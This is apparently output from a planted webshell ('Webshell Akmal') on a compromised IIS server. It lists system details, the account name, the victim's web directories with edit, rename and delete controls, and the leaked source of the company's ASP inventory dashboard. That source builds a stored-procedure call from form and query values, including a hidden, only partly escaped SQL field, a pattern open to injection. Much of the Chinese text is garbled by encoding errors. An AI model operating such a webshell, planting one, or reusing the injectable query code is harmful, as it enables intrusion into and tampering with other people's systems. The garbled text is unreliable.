Webshell Akmal archtte id
System:
Microsoft Windows NT 10.0.20348.0
Server:
Microsoft-IIS/10.0
User:
buyyou
Directory:
C:
\
MyData
\
WWW
\
asc365
\
Name
Size
Type
Actions
ASC365_CANADA
-
Directory
Rename
Delete
ASC365_Store01
-
Directory
Rename
Delete
aspnet_client
-
Directory
Rename
Delete
CompanyImage
-
Directory
Rename
Delete
TJGS_USA
-
Directory
Rename
Delete
zhijian
-
Directory
Rename
Delete
Memo.inc
0 bytes
.inc
Edit
Rename
Delete
web.config
213 bytes
.config
Edit
Rename
Delete
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%> <%Response.Charset="gb2312"%> <!--#include file="include/conn.asp" --> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <meta name="robots" content="noindex,nofollow"> <script type="text/javascript" src="js/echarts.min.js" charset="utf-8"></script> <script type="text/javascript" src="http://code.jquery.com/jquery-1.12.2.js"></script> <script type="text/javascript" src="js/ck.js?v=<%=Timestamp%>" charset="utf-8"></script> <title>ASC���ʹ�˾</title> <style> table{ border: solid 1px #000000; } table tr td{ border-Bottom: dotted 1px #000000; border-top: dotted 1px #000000; border-right: dotted 1px #000000; border-left-width:1px; border-left-color:#000000; } .box{ border-left-width:3px; border-left-color:#FF0000; border-Bottom: dotted 1px #000000; border-top: dotted 1px #000000; border-right: dotted 1px #000000; } </style> </head> <body style="text-align:center; margin:0 auto;"> <% flgRead = Request.Querystring("arg") if flgRead <> "Asc365NewSys" then response.end arg1 = Request.Querystring("fromdate") arg2 = Request.Querystring("todate") arg3 = Request.Querystring("zubie") arg4 = Request.Querystring("typ") if len(arg1) = 0 then fromdate = DateAdd("m",-1,date()) else fromdate = arg1 end if if len(arg2) = 0 then todate = DateAdd("d",-1,date()) else todate = arg2 end if '��ȡ���Ͳֿ� dim zu(100,2) zuname = "" '������ͼ������ʾ zu(0,0) = "" zu(0,1) = "All" id_zu = 1 set rszu = server.CreateObject("adodb.recordset") sqlzu = "select zu,zuname from (select zu,(case when ISNUMERIC(zu) =1 then zu+ '��' else zu end) as zuname from (select distinct(right(orgcode,2)) as zu from AA_STORERIJIE where opdt = dateadd(d,-2, cast(getdate() as date))union select distinct(dispvalue) as zu from OM_COMMPARM where FLDNAME = 'planorg')a)ss order by charindex(zu,'����|����ͨ|�������|��ѷ��˾|ͨ�ع�˾|') desc,zu" rszu.open sqlzu,conn,1,1 do while not rszu.eof zu(id_zu,0) = rszu(0) zu(id_zu,1) = rszu(1) id_zu = id_zu + 1 rszu.movenext loop rszu.close set rszu = nothing zubie = "" if len(arg3) =0 then zubie = "" else zubie = arg3 end if typ = "1" if len(arg4) = 0 then typ = "1" else typ = arg4 end if s1 = "ALL" s2 = "ALL" s3 = "ALL" s4 = "ALL" s5 = "ALL" sqll = "" if request.Form("submit")="submit" then fromdate = request.Form("fromdate") todate = request.Form("todate") if datediff("d",fromdate,"2016-06-26") >0 then fromdate = "2016-06-26" if datediff("d",todate,DateAdd("d",-1,date())) <0 then todate = DateAdd("d",-1,date()) zubie = request.Form("zubie") typ = request.Form("typ") sqll = request.Form("sqll") if Instr(sqll,"''") <= 0 then sqll = replace(sqll,"'","''") s1 = request.Form("store1") s2 = request.Form("store2") s3 = request.Form("store3") s4 = request.Form("store4") s5 = request.Form("store5") end if fromdate2 = fromdate echartsName = "" if typ = "1" then echartsName = "'��ֵ������ʵ�ʳɱ���$'" if typ = "2" then echartsName = "'�����m3��'" if typ = "3" then echartsName = "'�ɹ�������'" if typ = "4" then echartsName = "'��Ʒ����'" fuhao = "" if typ = "1" then fuhao = "'$'" if typ = "2" then fuhao = "'m3'" if typ = "3" then fuhao = "'��'" if typ = "4" then fuhao = "'��'" sql = "exec GetInoutStore '" & fromdate2 & "','" & todate & "','" & zubie &"','" & sqll &"','" & typ & "','1'" datedt = "[" in_cg = "[" in_db = "[" in_hy = "[" in_xsthh = "[" in_cgthh = "[" in_FBA = "[" in_pd = "[" set rs=server.CreateObject("adodb.recordset") rs.open sql,conn,1,1 do while not rs.eof datedt = datedt & "'" & rs(0) & "'," in_cg = in_cg & Round(rs(1),6) & "," in_db = in_db & Round(rs(2),6) & "," in_hy = in_hy & Round(rs(3),6) & "," in_xsthh = in_xsthh & Round(rs(4),6) & "," in_cgthh = in_cgthh & Round(rs(5),6) & "," in_FBA = in_FBA & Round(rs(6),6) & "," in_pd = in_pd & Round(rs(7),6) & "," rs.movenext loop rs.close set rs = nothing datedt = left(datedt,len(datedt)-1) & "]" in_cg = left(in_cg,len(in_cg)-1) & "]" in_db = left(in_db,len(in_db)-1) & "]" in_hy = left(in_hy,len(in_hy)-1) & "]" in_xsthh = left(in_xsthh,len(in_xsthh)-1) & "]" in_cgthh = left(in_cgthh,len(in_cgthh)-1) & "]" in_FBA = left(in_FBA,len(in_FBA)-1) & "]" in_pd = left(in_pd,len(in_pd)-1) & "]" sql = "exec GetInoutStore '" & fromdate2 & "','" & todate & "','" & zubie &"','" & sqll &"','" & typ & "','-1'" out_xsd = "[" out_db = "[" out_hy = "[" out_cghh = "[" out_cgth = "[" out_fba = "[" out_pd = "[" set rs=server.CreateObject("adodb.recordset") rs.open sql,conn,1,1 do while not rs.eof out_xsd = out_xsd & Round(rs(1),6) & "," out_db = out_db & Round(rs(2),6) & "," out_hy = out_hy & Round(rs(3),6) & "," out_cghh = out_cghh & Round(rs(4),6) & "," out_cgth = out_cgth & Round(rs(5),6) & "," out_fba = out_fba & Round(rs(6),6) & "," out_pd = out_pd & Round(rs(7),6) & "," rs.movenext loop rs.close set rs = nothing out_xsd = left(out_xsd,len(out_xsd)-1) & "]" out_db = left(out_db,len(out_db)-1) & "]" out_hy = left(out_hy,len(out_hy)-1) & "]" out_cghh = left(out_cghh,len(out_cghh)-1) & "]" out_cgth = left(out_cgth,len(out_cgth)-1) & "]" out_fba = left(out_fba,len(out_fba)-1) & "]" out_pd = left(out_pd,len(out_pd)-1) & "]" conn.close set conn = nothing sfromdate = "'" & fromdate & "'" stodate = "'" & todate & "'" for i = 0 to id_zu - 1 if zu(i,0) = zubie then zuname = zu(i,1) exit for end if next if zuname = "All" then zuname = "ȫ��˾" zuname = "'" & zuname & "'" %> <div style="margin:0 auto; text-align:center"> <form method="post" action="" align="center" name="prdmsg"> <table width="800" border="1" style="border-collapse: collapse" align="center"> <tr> <td nowrap>�ӣ�<input type="text" name="fromdate" value="<%=fromdate%>"></td> <td nowrap>����<input type="text" name="todate" value="<%=todate%>"></td> <td nowrap>��� <select name="zubie"> <%for i = 0 to id_zu-1%> <option value="<%=zu(i,0)%>" <%if zu(i,0) = zubie then%>selected="selected" <%end if%>><%=zu(i,1)%></option> <%next%> </select> </td> <td nowrap>�ֿ⣺ <select name="store1" onChange="chgck1()"> <option value="ALL" <%if s1="ALL" then %> selected <%end if%>>ALL</option> <option value="���ղֿ������˾" <%if s1="���ղֿ������˾" then %> selected <%end if%>>���ղֿ������˾</option> <option value="���ղֿ����ڵ�" <%if s1="���ղֿ����ڵ�" then %> selected <%end if%>>���ղֿ����ڵ�</option> <option value="FBA�ֿⰴ���������" <%if s1="FBA�ֿⰴ���������" then %> selected <%end if%>>FBA�ֿⰴ���������</option> <option value="FBA�ֿⰴ�������˾" <%if s1="FBA�ֿⰴ�������˾" then %> selected <%end if%>>FBA�ֿⰴ�������˾</option> <option value="WFS�ֿⰴ�������˾" <%if s1="WFS�ֿⰴ�������˾" then %> selected <%end if%>>WFS�ֿⰴ�������˾</option> </select> <select name="store2" value="<%=s2%>" onChange="chgck2()"><option value="<%=s2%>"><%=s2%></option></select> <select name="store3" value="<%=s3%>" onChange="chgck3()"><option value="<%=s3%>"><%=s3%></option></select> <select name="store4" value="<%=s4%>" onChange="chgck4()"><option value="<%=s4%>"><%=s4%></option></select> <select name="store5" value="<%=s5%>" onChange="chgck5()"><option value="<%=s5%>"><%=s5%></option></select> <input type="text" style="display:none" name="sqll" value="<%=sqll%>"/> </td> <td nowrap>��ѯ���ݣ� <select name="typ"> <option value="1" <%if typ = "1" then%>selected="selected"<%end if%>>����ʵ�ʳɱ�</option> <option value="2" <%if typ = "2" then%>selected="selected"<%end if%>>�����m3��</option> <option value="3" <%if typ = "3" then%>selected="selected"<%end if%>>�ɹ�������</option> <option value="4" <%if typ = "4" then%>selected="selected"<%end if%>>����</option> </select> </td> <td nowrap><input type="submit" name="submit" value="submit"></td> </tr> <tr> <td colspan="6">ע����ǰ�����������ʱ�䷶Χ�ǣ�2016-07-26 �� ���졣</br> �����̵��FBA�����һ�û�л���ʵ�ʳ���ֿ⣬�ܿ�����ݲ����㡣</br> ������Դ��ʵʱ��ˮ���ݺ͵�ǰ��Ʒ�ļ��س����ݡ�</br>���ڲ鿴�����ֿ���ʵ����ֿ��Ʒ�����(2022-03-31 Frank) </td> </tr> </table> <script>init2()</script> </form> </div> <div id="container" style="text-align:center; height:83%" >Loading...</div> </div> </body> </html> <script type="text/javascript"> var dataX = <%=datedt%>; var mydd = [<%=in_cg%>, <%=in_db%>, <%=in_hy%>, <%=in_xsthh%>, <%=in_cgthh%>, <%=in_FBA%>, <%=in_pd%>]; var myddout = [<%=out_xsd%>, <%=out_db%>, <%=out_hy%>, <%=out_cghh%>, <%=out_cgth%>, <%=out_fba%>, <%=out_pd%>]; var zong = 0.00; var arrayzong = []; for (var ii = 0;ii < dataX.length;ii++) { zong = mydd[0][ii] + mydd[1][ii] + mydd[2][ii] + mydd[3][ii] + mydd[4][ii]; arrayzong.push(zong.toFixed(6)); } mydd.unshift(arrayzong); var outarrayzong = []; for (var ii = 0;ii < dataX.length;ii++) { zong = myddout[0][ii] + myddout[1][ii] + myddout[2][ii] + myddout[3][ii] + myddout[4][ii]; outarrayzong.push(zong.toFixed(6)); } myddout.unshift(outarrayzong); var myddhuizong = [[],[],[],[],[],[],[],[]]; var valnew = 0; //�������� for(var jj = 0;jj < dataX.length;jj++) { valnew = Number(mydd[2][jj]) + Number(myddout[2][jj]); myddhuizong[1].push(valnew.toFixed(6)); } //FBA���� for(var jj = 0;jj < dataX.length;jj++) { valnew = Number(mydd[6][jj]) + Number(myddout[6][jj]); myddhuizong[2].push(valnew.toFixed(6)); } //�̵����� for(var jj = 0;jj < dataX.length;jj++) { valnew = Number(mydd[7][jj]) + Number(myddout[7][jj]); myddhuizong[3].push(valnew.toFixed(6)); } for(var jj = 0;jj < dataX.length;jj++) { valnew = Number(mydd[0][jj]) + Number(myddout[0][jj]); myddhuizong[0].push(valnew.toFixed(6)); } var myddleiji = JSON.parse(JSON.stringify(mydd)); var myddoutleiji = JSON.parse(JSON.stringify(myddout)); var myddhuizongleiji = JSON.parse(JSON.stringify(myddhuizong)); for(var ii = 0;ii < 8; ii++) { for(var jj = 1;jj < dataX.length;jj++) { myddleiji[ii][jj] = Number(myddleiji[ii][jj]) + Number(myddleiji[ii][jj-1]); myddleiji[ii][jj] = myddleiji[ii][jj].toFixed(6); myddoutleiji[ii][jj] = Number(myddoutleiji[ii][jj]) + Number(myddoutleiji[ii][jj-1]); myddoutleiji[ii][jj] = myddoutleiji[ii][jj].toFixed(6); myddhuizongleiji[ii][jj] = Number(myddhuizongleiji[ii][jj]) + Number(myddhuizongleiji[ii][jj-1]); myddhuizongleiji[ii][jj] = myddhuizongleiji[ii][jj].toFixed(6); } } for(var ii = 0;ii < 8; ii++) { for(var jj = 0;jj < dataX.length;jj++) { mydd[ii][jj] = Number(mydd[ii][jj]).toFixed(2); myddout[ii][jj] = Number(myddout[ii][jj]).toFixed(2); myddhuizong[ii][jj] = Number(myddhuizong[ii][jj]).toFixed(2); myddleiji[ii][jj] = Number(myddleiji[ii][jj]).toFixed(2); myddoutleiji[ii][jj] = Number(myddoutleiji[ii][jj]).toFixed(2); myddhuizongleiji[ii][jj] = Number(myddhuizongleiji[ii][jj]).toFixed(2); } } var legendruku = ['�ܿ��','�ɹ�','����','����','�����˻���','�ɹ�����','FBA�����һز�Ʒ','�̵�']; var legendchuku = ['�ܿ��','����','����','����','�ɹ�����','�ɹ��˻�','FBA�����һز�Ʒ','�̵�']; var legendhuizong = ['�ܿ��','����','FBA�����һز�Ʒ','�̵�']; var seriesdata = []; for(var ii=0;ii<8;ii++){var ddnew={name:legendruku[ii]+'���',type:'line',data:mydd[ii]};seriesdata.push(ddnew);} for(var ii=0;ii<8;ii++){var ddnew={name:legendchuku[ii]+'����',type:'line',data:myddout[ii]};seriesdata.push(ddnew);} for(var ii=0;ii<4;ii++){var ddnew={name:legendhuizong[ii]+'����',type:'line',data:myddhuizong[ii]};seriesdata.push(ddnew);} for(var ii=0;ii<8;ii++){var ddnew={name:legendruku[ii]+'�ۼ����',type:'line',data:myddleiji[ii]};seriesdata.push(ddnew);} for(var ii=0;ii<8;ii++){var ddnew={name:legendchuku[ii]+'�ۼƳ���',type:'line',data:myddoutleiji[ii]};seriesdata.push(ddnew);} for(var ii=0;ii<4;ii++){var ddnew={name:legendhuizong[ii]+'�ۼƻ���',type:'line',data:myddhuizongleiji[ii]};seriesdata.push(ddnew);} var dom = document.getElementById("container"); var myChart = echarts.init(dom); var app = {}; option = null; option = { title: { // text: '��ֵ�仯���' }, tooltip: { trigger: 'axis' }, legend: { data:[ '�ܿ�����','�ɹ����','�������','�������','�����˻������','�ɹ��������','FBA�����һز�Ʒ���','�̵����','\n', '�ܿ�����','���۳���','��������','���˳���','�ɹ���������','�ɹ��˻�����','FBA�����һز�Ʒ����','�̵����','\n', '�ܿ�����','��������','FBA�����һز�Ʒ����','�̵����','\n', '�ܿ���ۼ����','�ɹ��ۼ����','�����ۼ����','�����ۼ����','�����˻����ۼ����','�ɹ������ۼ����','FBA�����һز�Ʒ�ۼ����','�̵��ۼ����','\n', '�ܿ���ۼƳ���','�����ۼƳ���','�����ۼƳ���','�����ۼƳ���','�ɹ������ۼƳ���','�ɹ��˻��ۼƳ���','FBA�����һز�Ʒ�ۼƳ���','�̵��ۼƳ���','\n', '�ܿ���ۼƻ���','�����ۼƻ���','FBA�����һز�Ʒ�ۼƻ���','�̵��ۼƻ���' ], selected:{ '�ܿ�����':false,'�ɹ����':false,'�������':false,'�������':false,'�����˻������':false,'�ɹ��������':false,'FBA�����һز�Ʒ���':false,'�̵����':false, '�ܿ�����':false,'���۳���':false,'��������':false,'���˳���':false,'�ɹ���������':false,'�ɹ��˻�����':false,'FBA�����һز�Ʒ����':false,'�̵����':false, '�ܿ�����':false,'��������':false,'FBA�����һز�Ʒ����':false,'�̵����':false, '�ܿ���ۼ����':true,'�ɹ��ۼ����':false,'�����ۼ����':false,'�����ۼ����':false,'�����˻����ۼ����':false,'�ɹ������ۼ����':false,'FBA�����һز�Ʒ�ۼ����':false,'�̵��ۼ����':false, '�ܿ���ۼƳ���':true,'�����ۼƳ���':false,'�����ۼƳ���':false,'�����ۼƳ���':false,'�ɹ������ۼƳ���':false,'�ɹ��˻��ۼƳ���':false,'FBA�����һز�Ʒ�ۼƳ���':false,'�̵��ۼƳ���':false, '�ܿ���ۼƻ���':true,'�����ۼƻ���':false,'FBA�����һز�Ʒ�ۼƻ���':false,'�̵��ۼƻ���':false }, left:'center', }, grid: { top: '170', left: '3%', right: '4%', bottom: '5%', containLabel: true }, toolbox: { feature: { dataView : {show: true, readOnly: false,title:'�鿴����'}, saveAsImage: { title: '����ΪͼƬ' } } }, xAxis: { name: '����', type: 'category', boundaryGap: false, data: dataX }, yAxis: { name: '���' + <%=echartsName%> + '', type: 'value', scale:'true', nameTextStyle:{ fontSize:'15' } }, dataZoom:[{ startValue: dataX[0] },{ type: 'inside' }], series: seriesdata }; ; if (option && typeof option === "object") { myChart.setOption(option, true); } </script>